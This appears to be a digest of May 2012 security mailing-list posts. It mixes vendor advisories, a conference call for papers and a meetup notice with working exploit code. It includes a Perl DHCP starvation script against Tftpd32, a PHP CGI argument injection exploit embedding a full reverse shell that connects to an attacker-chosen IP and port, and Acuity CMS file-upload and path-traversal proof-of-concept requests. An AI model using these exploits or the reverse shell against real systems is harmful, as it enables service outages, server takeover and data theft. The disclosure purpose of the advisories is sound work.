Tftpd32 DHCP Server Denial Of Service Vulnerability
Title: Tftpd32 DHCP Server Denial Of Service Vulnerability Software : Tftpd32 Software Version : v4.00 Vendor: http://tftpd32.jounin.net/ Vulnerability Published : 2012-05-21 Vulnerability Update Time : Status : Impact : Medium(CVSS2 Base : 5.0, AV:N/AC:L/Au:N/C:N/I:N/A:P) Bug Description : Tftpd32 is a free tftp and dhcp server for windows, freeware tftp server. The tftpd32's dhcp server does not identify whether the real source mac address of dhcp discover packet is the same as client hardware address in payload of dhcp discover packet, so that attacker can makes evil dhcp discover packets to cram dhcp client list of the dhcp server, and then no one can gain ip address from the dhcp server. Solution : Like the other dhcp server, the tftpd32's dhcp server can drop the dhcp discover packet when it was detected the different between source mac address of dhcp discover packet and client hardware address in payload of dhcp discover packet. Proof Of Concept : --- #!/usr/bin/perl use IO::Socket::INET; use Net::DHCP::Packet; use Net::DHCP::Constants; $a=1; while(1){ print "\Request Number : $a\n"; $mac=int(rand(9)).int(rand(9)).int(rand(9)).int(rand(9)).int(rand(9)).int(rand(9)). int(rand(9)).int(rand(9)).int(rand(9)).int(rand(9)).int(rand(9)).int(rand(9)); $socket = IO::Socket::INET->new( Proto => 'udp', Broadcast => 1, LocalPort => 68, PeerAddr =>'255.255.255.255', PeerPort => 67, ) || die "Unable to create socket: $@\n"; $discover = Net::DHCP::Packet->new( xid => int rand(0x), Chaddr => $mac, DHO_DHCP_MESSAGE_TYPE() => DHCPDISCOVER(), DHO_VENDOR_CLASS_IDENTIFIER() => 'MyVendorClassID', DHO_DHCP_PARAMETER_REQUEST_LIST() => '1 2 6 12 15 28 67'); $discover->addOptionRaw( 61, pack('H*',$mac)); print "Sending DISCOVER to 255.255.255.255:67\n"; $socket->send( $discover->serialize() ) or die "Unable to send Discover:$!\n"; $socket->close(); sleep(3); $a++; } exit(1); --- Credits : This vulnerability was discovered by demonalex(at)163(dot)com mail: demonalex(at)163(dot)com / chaoyi.hu...@connect.polyu.hk Pentester/Researcher Dark2S Security Team/PolyU.HK
DC4420 - London DEFCON - May meet - Tuesday May 22nd 2012
Back at the Phoenix Sorry for the late notice, but you know the score by now :) Speakers: 'Why Industrial System air-gaps suck.' Eireann Leverett of IOActive A talk on why industrial systems can increasingly be found on the internet, and how to work with CERTs to change it. We've also got room for a 30min fun talk, so ping me when you get there if you have one... Venue is here: The Phoenix 37 Cavendish Square London W1G 0PP http://www.phoenixcavendishsquare.co.uk/ 2 minutes walk from Oxford Circus tube. Date: Tuesday 22nd May 2012 Time: 17:30 till kicking out, talks start at 19:30 See you tomorrow! cheers, MM -- "In DEFCON, we have no names..." errr... well, we do... but silly ones...
[Announcement] CHMag's Issue 28, May 2012 Released
Dear All, Here we are with our 28th issue of ClubHack Magazine. This issue covers following articles:- 0x00 Tech Gyan - Steganography over converted channels 0x01 Tool Gyan - Kautilya 0x02 Mom's Guide - HTTPS (Hyper Text Transfer Protocol Secure) 0x03 Legal Gyan - Section 66C - Punishment for identity theft 0x04 Code Gyan - Dont Get Injected Fix Your Code 0x05 Poster - "Look both side before crossing one way track" Check http://chmag.in/ for articles. PDF version can be download from:- http://chmag.in/issue/may2012.pdf Send us your feedback, articles at i...@chmag.in Regards, Team CHMag http://chmag.in
[SECURITY] [DSA 2477-1] sympa security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - Debian Security Advisory DSA-2477-1 secur...@debian.org http://www.debian.org/security/Florian Weimer May 20, 2012 http://www.debian.org/security/faq - - Package: sympa Vulnerability : authorization bypass Problem type : remote Debian-specific: no CVE ID : CVE-2012-2352 Debian Bug : Several vulnerabilities have been discovered in Sympa, a mailing list manager, that allow to skip the scenario-based authorization mechanisms. This vulnerability allows to display the archives management page, and download and delete the list archives by unauthorized users. For the stable distribution (squeeze), this problem has been fixed in version 6.0.1+dfsg-4+squeeze1. For the testing distribution (wheezy), this problem will be fixed soon. For the unstable distribution (sid), this problem has been fixed in version 6.1.11~dfsg-2. We recommend that you upgrade your sympa packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.10 (GNU/Linux) iQEcBAEBAgAGBQJPuT+EAAoJEL97/wQC1SS+vxAH/jYCNKyrlOKvMj61ZCc+bxxH X/kgdQEGgqw70pQYnlxM81hZr1YdK0KgncTiNqa0R9iN3SrVDgYNGJNGOZSxAE+M zGqduwkeh8QRXpwORb11DKqYIAPxVYvKnJwxHv/SzFskh9Lm4ppX1vdpVZqpDNpd 8GB2xlgqjb1SKy7YYmGaGIZ6mVMqzG4+bKuix7xIiAkFhu5loQ7mnSaWlgFjeMre tdy0Gz56rfYfuwcpC0qdEn9tfVUWBVYALG5ZgWt2i1XeMN7dNAu3FRAZvNNmxqMt YEft+TnXdfre34Vd68kszShRlVaqEqjjtYdAY2pq4Prttqg/vKXGWg139QfJEjE= =LMTp -END PGP SIGNATURE-
PHP CGI Argument Injection Remote Exploit V0.3 - PHP Version
# www.bugreport.ir # # Title: PHP CGI Argument Injection Remote Exploit V0.3 - PHP Version # Vendor: http://www.php.net # Vulnerable Version: PHP up to version 5.3.12 and 5.4.2 # Exploitation: Remote # Original Advisory: http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/ # Original Exploit URL: http://www.bugreport.ir/79/exploit.htm # CVE:CVE-2012-1823 # Coded By: Mostafa Azizi (admin[@]0-Day[dot]net) ### /* This tool may be used for legal purposes only. Users take full responsibility for any actions performed using this tool. The author accepts no liability for damage caused by this tool. If these terms are not acceptable to you, then do not use this tool.*/ error_reporting(0); ini_set("max_execution_time",0); ini_set("default_socket_timeout", 10); ob_implicit_flush (1); echo' PHP CGI Argument Injection Remote Exploit PHP CGI Argument Injection Coded by: Mostafa Azizi (admin[@]0-Day[dot]net) Mass File Uploader Reverse Shell enctype="multipart/form-data" method="post"> Please specify a file to scan: size="40"> * Please specify a file to upload: size="40"> * specify a port (default is 80): class="Stile5"> Proxy (ip:port): class="Stile5"> color="#FF">* fields are required name="Submit"> enctype="multipart/form-data" method="post"> hostname (ex: www.sitename.com): class="Stile5"> Your IP (ex: 173.194.35.169 ): Your Port (ex: 80): class="Stile5"> color="#FF">All fields are required name="Submit2"> '; $host= $_POST['host']; $lip = $_POST['lip']; $lport = $_POST['lport']; $port= $_POST['port']; $proxy = $_POST['proxy']; $list= file($_FILES['listfile']['tmp_name']); $file= base64_encode(gzdeflate(file_get_contents($_FILES['datafile']['tmp_name']))); $shell = "gzinflate(base64_decode(\"$file\"))"; if (isset($_POST['Submit2']) && $host != '' && $lip != '' && $lport != '') { /*pentestmonkey's php-reverse-shell. Limitations: proc_open and stream_set_blocking require PHP version 4.3+, or 5+ */ /* Connect Back */ $payload = "'$lip'; \$port = $lport; \$chunk_size = 1400; \$write_a = null; \$error_a = null; \$shell = 'uname -a; w; id; /bin/sh -i'; \$daemon = 0;\$debug = 0; if (function_exists('pcntl_fork')) { \$pid = pcntl_fork(); if (\$pid == -1) { printit(\"ERROR: Can't fork\"); exit(1);} if (\$pid) { exit(0);} if (posix_setsid() == -1) { printit(\"Error: Can't setsid()\"); exit(1); } \$daemon = 1;} else { printit(\"WARNING: Failed to daemonise. This is quite common and not fatal.\");}chdir(\"/\"); umask(0); \$sock = fsockopen(\$ip, \$port, \$errno, \$errstr, 30);if (!\$sock) { printit(\"\$errstr (\$errno)\"); exit(1);} \$descriptorspec = array(0 => array(\"pipe\", \"r\"),1 => array(\"pipe\", \"w\"), 2 => array(\"pipe\", \"w\"));\$process = proc_open(\$shell, \$descriptorspec, \$pipes);if (!is_resource(\$process)) { printit(\"ERROR: Can't spawn shell\"); exit(1);}stream_set_blocking(\$pipes[0], 0);stream_set_blocking(\$pipes[1], 0);stream_set_blocking(\$pipes[2], 0);stream_set_blocking(\$sock, 0);printit(\"Successfully opened reverse shell to \$ip:\$port\"); while (1) {if (feof(\$sock)) { printit(\"ERROR: Shell connection terminated\"); break;} if (feof(\$pipes[1])) {printit(\"ERROR: Shell process terminated\");break;}\$read_a = array(\$sock, \$pipes[1], \$pipes[2]);\$num_changed_sockets = stream_select(\$read_a, \$write_a, \$error_a, null);if (in_array(\$sock, \$read_a)) {if (\$debug) printit(\"SOCK READ\");\$input = fread(\$sock, \$chunk_size);if(\$debug) printit(\"SOCK: \$input\");fwrite(\$pipes[0], \$input);}if (in_array(\$pipes[1], \$read_a)) {if (\$debug) printit(\"STDOUT READ\");\$input = fread(\$pipes[1], \$chunk_size);if (\$debug) printit(\"STDOUT: \$input\");fwrite(\$sock, \$input);}if (in_array(\$pipes[2], \$read_a)) {if (\$debug) printit(\"STDERR READ\");\$input = fread(\$pipes[2], \$chunk_size);if (\$debug) printit(\"STDERR: \$input\");fwrite(\$sock, \$input);}}fclose(\$sock);fclose(\$pipes[0]);fclose(\$pipes[1]);fclose(\$pipes[2]);proc_close(\$process);function printit (\$string) {if (!\$daemon) {print \"\$string\n\";}} ?>"; $packet = "POST ".$p."/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1\r\n"; $packet .= "Host: ".$host."\r\n";
Acuity CMS 2.6.x <= Arbitrary File Upload
1. OVERVIEW Acuity CMS 2.6.x (ASP-based) versions are vulnerable to Arbitrary File Upload. 2. BACKGROUND Acuity CMS is a powerful but simple, extremely easy to use, low priced, easy to deploy content management system. It is a leader in its price and feature class. 3. VULNERABILITY DESCRIPTION Acuity CMS 2.6.x (ASP-based) version contain a flaw that may allow an attacker to upload .asp/.aspx files without restrictions, which will execute ASP(.Net) codes. The issue is due to the script, /admin/file_manager/file_upload_submit.asp , not properly sanitizing 'file1', 'file2', 'file3', 'fileX' parameters. 4. VERSIONS AFFECTED Tested with version 2.6.2. 5. PROOF-OF-CONCEPT/EXPLOIT [REQUEST] POST /admin/file_manager/file_upload_submit.asp HTTP/1.1 Host: localhost Cookie: ASPSESSIONID=XXX -6dc3a236402e2 Content-Disposition: form-data; name="path" /images -6dc3a236402e2 Content-Disposition: form-data; name="rootpath" / -6dc3a236402e2 Content-Disposition: form-data; name="rootdisplay" http://localhost/ -6dc3a236402e2 Content-Disposition: form-data; name="status" confirmed -6dc3a236402e2 Content-Disposition: form-data; name="action" fileUpload -6dc3a236402e2 Content-Disposition: form-data; name="file1"; filename="0wned.asp" Content-Type: application/octet-stream <% response.write("0wned!") %> -6dc3a236402e2-- [/REQUEST] 6. SOLUTION The Acunity CMS is no longer in active development. It is recommended to user another CMS in active development and support. 7. VENDOR The Collective http://www.thecollective.com.au/ 8. CREDIT Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar. 9. DISCLOSURE TIME-LINE 2012-05-20: vulnerability disclosed 10. REFERENCES Original Advisory URL: http://yehg.net/lab/pr0js/advisories/%5Bacuity_cms2.6%20x_(asp)%5D_arbitrary_fileupload #yehg [2012-05-20]
Acuity CMS 2.6.x <= Path Traversal Arbitrary File Access
1. OVERVIEW Acuity CMS 2.6.x (ASP-based) versions are vulnerable to Path Traversal. 2. BACKGROUND Acuity CMS is a powerful but simple, extremely easy to use, low priced, easy to deploy content management system. It is a leader in its price and feature class. 3. VULNERABILITY DESCRIPTION The issue is due to the script, /admin/file_manager/browse.asp, not properly sanitizing user input, specifically directory traversal style attacks (e.g., ../../) supplied via the 'path' parameter. It would allow the attacker to access arbitrary files outside of web root directory. 4. VERSIONS AFFECTED Tested with version 2.6.2. 5. PROOF-OF-CONCEPT/EXPLOIT http://localhost/admin/file_manager/browse.asp?field=&form=&path=../../ 6. SOLUTION The Acunity CMS is no longer in active development. It is recommended to user another CMS in active development and support. 7. VENDOR The Collective http://www.thecollective.com.au/ 8. CREDIT Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar. 9. DISCLOSURE TIME-LINE 2012-05-20: vulnerability disclosed 10. REFERENCES Original Advisory URL: http://yehg.net/lab/pr0js/advisories/%5Bacuity_cms2.6%20x_(asp)%5D_path_traversal #yehg [2012-05-20]
[SECURITY] [DSA 2476-1] pidgin-otr security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - Debian Security Advisory DSA-2476-1 secur...@debian.org http://www.debian.org/security/Jonathan Wiltshire May 19, 2012 http://www.debian.org/security/faq - - Package: pidgin-otr Vulnerability : format string vulnerability Problem type : remote Debian-specific: no CVE ID : CVE-2012-2369 Debian Bug : 673154 intrigeri discovered a format string error in pidgin-otr, an off-the-record messaging plugin for Pidgin. This could be exploited by a remote attacker to cause arbitrary code to be executed on the user's machine. The problem is only in pidgin-otr. Other applications which use libotr are not affected. For the stable distribution (squeeze), this problem has been fixed in version 3.2.0-5+squeeze1. For the testing distribution (wheezy), this problem has been fixed in version 3.2.1-1. For the unstable distribution (sid), this problem has been fixed in version 3.2.1-1. We recommend that you upgrade your pidgin-otr packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.10 (GNU/Linux) iQEcBAEBAgAGBQJPt/OHAAoJEL97/wQC1SS+lH0IAIunPaG8K1FkRvp/HWeqAXHG PeWKPCgeSw6bl5Ab5zQuaZLhCT3XLYLJJq+wKm6sEaTlFstA3C7Tcf8b+n802+yP HXueDzn+J4wYhBD6l+R8xfPYkFUqnkjMIqVYoEvpEjbCTCBUhDep/vtzOOh3ZL8y Iz0Hgun1CL186o1p4SCNd8irLfmxUg41vOob8+XTLNKYUxDyomLk9p111f8i62wV AWOqGJ+AEzY2Ni6ThFNJdnbm2ThFfOfgS8TK3r3331PX9+eHpfR3+cxIBGZ+3dtu Ox7qkDd6c/Ko7cLqkiT6A/DHYZ98p1KxEDqS5eTcTwTOyL+GE7s1cJMsSApCAdw= =gcop -END PGP SIGNATURE-
Call for Papers: The 7th International Conference for Internet Technology and Secured Transactions (ICITST-2012)
Call for Papers: The 7th International Conference for Internet Technology and Secured Transactions (ICITST-2012) Apologies for cross-postings. Kindly email this call for papers to your colleagues, faculty members and postgraduate students. CALL FOR PAPERS * Papers: The 7th International Conference for Internet Technology and Secured Transactions (ICITST-2012) Technical Co-Sponsored by IEEE UK/RI Computer Chapter December 10-12, 2012, London, United Kingdom www.icitst.org * The 7th International Conference for Internet Technology and Secured Transactions (ICITST-2012) is Technical Co-Sponsored by IEEE UK/RI Computer Chapter. The ICITST is an international refereed conference dedicated to the advancement of the theory and practical implementation of secured Internet transactions and to fostering discussions on information technology evolution. The ICITST aims to provide a highly professional and comparative academic research forum that promotes collaborative excellence between academia and industry. The objectives of the ICITST are to bridge the knowledge gap between academia and industry, promote research esteem in secured Internet transactions and the importance of information technology evolution to secured transactions. The ICITST-2012 invites research papers that encompass conceptual analysis, design implementation and performance evaluation. The topics in ICITST-2012 include but are not confined to the following areas: 1. Internet Application and Technology Internet technologies, Internet Architecture, Internet of things, Broadband Access Technologies, Application Agents, Boundary Issues of Internet Security, Database Management, Data Models for Production Systems and Services, Artificial Intelligence and Expert Systems, IPSec Quality of Service, Knowledge Management, Embedded Systems, Defence Systems 2. Information Security Collaborative Learning , Trust, Privacy and Data Security, Network Security Issues and Protocols, Security Challenges and Content Authoring, Cryptography, Secure Communications, Authentication Techniques, Chaos-based Data Security, MANET Security, Wireless Sensor Network Security, Organization Considerations in Security Policy Formulation and Implementations, Digital Forensics and Crimes, Biometrics, Cyber Security 3. Ubi/Cloud Computing Authentication and Access Control for Data Protection in Ubi/Cloud Computing, Context-Awareness and its Data Mining for UbiCom, Data Grids, Distributed Information Systems, Human-Computer Interface and Interaction for UbiCom, Ubiquitous Systems, USN/RFID Service, Smart Homes and its Business Model for UbiCom Service, Security and Data Management for UbiCom, Peer to Peer Data Management, New Novel Mechanism and Application for Ubi/Cloud Computing 4. Infonomics and e-Technology Infonomics, Information Visualization, Information Management, Information Quality TechnologyEnabled Information,e-Learning, e-Commerce, e-Business, e-Government, e-Society, System Design and Security for e-Services, Synchronizing e-Security 5. Multimedia and Web Services Intelligent Multimedia and its Data Management, Multimedia Information Systems, Multimedia Security, Web Databases, Web Metrics and its Applications, Web Mining including Web Intelligence and Web 3.0., Web Services, XML and other extensible languages, Semantic Web and Ontology 6. Cloud Security Secure Virtual Infrastructure and Private Cloud, Cryptographic Enforcement of Multi-Tenancy, Cloud Requirements for PaaS and SaaS, Security Policy and Privacy Requirements, Cloud Audit Protocol 7. Research in Progress Ongoing research from undergraduates, graduates/postgraduates and professionals, Collaborative Research, Future Technologies Submission Guidelines The authors are invited to submit papers based on their original work not exceeding 6 pages in length for full papers (including all figures, tables and references). Additional pages cost GBP £25.00 per page with a maximum of 2 pages. We also encourage submissions of proposals for tutorials, workshops and special tracks. Details on the submission procedure are available at http://www.icitst.org/Paper%20Submission.html The extended abstract should not exceed 2 pages (including introduction, body of knowledge and conclusion, supported by not more than 10 references). Please submit your extended abstract in PDF format at extendedabstr...@icitst.org Important Dates Full Paper Submission: August 01, 2012 Extended Abstract Submission: August 15, 2012 Tutorial, Workshop and Special Track Proposal Submission: August 31, 2012 Notification of Paper Acceptance: September 25, 2012 For further details, please visit www.icitst.org
[ MDVSA-2012:079 ] sudo
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2012:079 http://www.mandriva.com/security/ ___ Package : sudo Date: May 21, 2012 Affected: 2010.1, 2011., Enterprise Server 5.0 ___ Problem Description: A vulnerability has been found and corrected in sudo: A flaw exists in the IP network matching code in sudo versions 1.6.9p3 through 1.8.4p4 that may result in the local host being matched even though it is not actually part of the network described by the IP address and associated netmask listed in the sudoers file or in LDAP. As a result, users authorized to run commands on certain IP networks may be able to run commands on hosts that belong to other networks not explicitly listed in sudoers (CVE-2012-2337 The updated packages have been patched to correct this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2337 http://www.sudo.ws/sudo/alerts/netmask.html ___ Updated Packages: Mandriva Linux 2010.1: 10f9635c97df775aa2e84eea10cc2520 2010.1/i586/sudo-1.7.4p6-0.2mdv2010.2.i586.rpm 172ec1e9eb59daf6c619083544395615 2010.1/SRPMS/sudo-1.7.4p6-0.2mdv2010.2.src.rpm Mandriva Linux 2010.1/X86_64: 7c223e5185387d690b1fd5c9aedbb072 2010.1/x86_64/sudo-1.7.4p6-0.2mdv2010.2.x86_64.rpm 172ec1e9eb59daf6c619083544395615 2010.1/SRPMS/sudo-1.7.4p6-0.2mdv2010.2.src.rpm Mandriva Linux 2011: 4eaa11586daaf481506b9383462e11b1 2011/i586/sudo-1.7.6p2-1.1-mdv2011.0.i586.rpm 54e9566af0fc7a350b91a14351e83a9c 2011/SRPMS/sudo-1.7.6p2-1.1.src.rpm Mandriva Linux 2011/X86_64: c1a370556138f31669c713c7544ee042 2011/x86_64/sudo-1.7.6p2-1.1-mdv2011.0.x86_64.rpm 54e9566af0fc7a350b91a14351e83a9c 2011/SRPMS/sudo-1.7.6p2-1.1.src.rpm Mandriva Enterprise Server 5: b713c66d70635d93ccf68864c8849fe8 mes5/i586/sudo-1.7.4p6-0.2mdvmes5.2.i586.rpm 1de7c7de8f1764ecad9d727bae373fa7 mes5/SRPMS/sudo-1.7.4p6-0.2mdvmes5.2.src.rpm Mandriva Enterprise Server 5/X86_64: 6cabbb3df9d3ab16adb1f29b42ec24c5 mes5/x86_64/sudo-1.7.4p6-0.2mdvmes5.2.x86_64.rpm 1de7c7de8f1764ecad9d727bae373fa7 mes5/SRPMS/sudo-1.7.4p6-0.2mdvmes5.2.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.11 (GNU/Linux) iD4DBQFPujn1mqjQ0CJFipgRAk+EAJ4jVLd17ksb/Ueg34F6Lfhd99OJpQCXTU5D Bt4a74E/fTXDzhyIPE8rjw== =wXih -END PGP SIGNATURE-